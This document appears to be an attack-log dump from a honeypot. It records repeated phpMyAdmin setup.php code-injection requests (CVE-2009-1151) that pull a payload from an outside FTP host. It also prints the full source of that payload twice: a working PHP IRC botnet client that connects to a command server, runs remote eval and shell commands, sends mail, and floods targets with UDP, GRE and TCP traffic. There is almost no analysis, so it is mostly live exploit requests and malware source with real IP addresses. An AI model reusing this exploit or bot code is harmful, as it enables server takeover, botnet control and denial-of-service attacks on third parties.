$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 08:10:31
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /2phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/2phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 08:10:30
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /myadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/myadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 06:39:45
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
